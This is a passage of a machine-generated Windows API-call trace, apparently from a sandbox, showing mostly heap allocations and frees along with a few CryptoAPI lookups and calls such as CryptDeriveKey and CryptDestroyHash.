hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0165.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b90 [0165.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0165.509] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0165.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0165.509] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87090) returned 1 [0165.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0165.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0165.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0165.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0165.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0165.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0165.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0165.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0165.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0165.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0165.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0165.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.514] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0165.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0165.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0165.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0165.515] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0165.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0165.515] CryptDestroyHash (hHash=0xa87050) returned 1 [0165.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0165.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0165.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0165.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0165.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0165.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0165.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0165.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 